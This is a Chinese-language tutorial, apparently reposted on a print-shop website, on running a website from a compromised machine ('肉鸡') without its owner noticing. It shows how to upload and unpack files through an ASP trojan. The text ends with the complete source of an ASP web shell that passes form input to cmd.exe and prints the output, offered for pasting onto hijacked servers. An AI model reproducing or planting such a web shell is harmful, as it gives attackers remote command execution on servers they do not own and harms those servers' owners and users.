 |
|
|
 首页 |
名片设计 CorelDRAW Illustrator AuotoCAD Painter 其他软件 Photoshop Fireworks Flash |
|
在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天轻易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和asp木马可以轻松实现. asp木马大家都很认识,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序.我选择了化境的webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继承)和一个asp木马(假如,实在懒得找.最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过假如有很多文件一个一个上传可就麻烦了,怎么办?这下asp木马用上了.找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,假如是别的命令行的解压缩工具也可以喔)把它拷到%SystemRoot%system32下.上传.zip或者.rar文件到该肉鸡的web目录.在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,V,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方式,修改trojan.asp加入一行转变虚拟目录成绝对路径并输出的语句<% =server.mappath(".") %>,"."可以随意改成任何的相对虚拟目录. 只是提供一个思路,假如哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,假如真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压,不知会不会弹出对话框。 --------以下是asp木马的源码,建议在<html>后加上<% =server.mappath(".") %>------------------------------ <%@ Language=VBScript %> <% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next \\\' -- create the COM objects that we will be using -- \\\' Set oScript = Server.createObject("WSCRIPT.SHELL") Set oScriptNet = Server.createObject("WSCRIPT.NETWORK") Set oFileSys = Server.createObject("Scripting.FileSystemObject") \\\' -- check for a command that we have posted -- \\\' szCMD = Request.form(".CMD") If (szCMD <> "") Then \\\' -- Use a poor man\\\'s pipe ... a temp file -- \\\' szTempFile = "C:" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %> <HTML> <BODY> <form action="<%= Request.ServerVariables("URL") %>" method="POST"> <input type=text name=".CMD" size=45 value="<%= szCMD %>"> <input type=submit value="Run"> </form> <PRE> <% If (IsObject(oFile)) Then \\\' -- Read the output from our command and remove the temp file -- \\\' On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.deleteFile(szTempFile, True) End If %> </BODY> </HTML> 返回类别: 教程 上一教程: 在ASP中使用SQL语句之9:表单操作 下一教程: 关于SQL注入防备函数 您可以阅读与"用ASP木马实现FTP和解压缩"相关的教程: · 用ASP实现在线压缩与解压缩 · 让ASP也能解压缩RAR文件 · 菜鸟详听ASP中也能解压缩RAR文件 · ASP + SERV-U 实现FTP的代码 · ASP+SERV-U 实现FTP的代码 |
  |
| 快精灵印艺坊 版权所有 |
首页 会员中心在线印刷在线编辑付款方式索取样品设计指南连锁门店
|
||
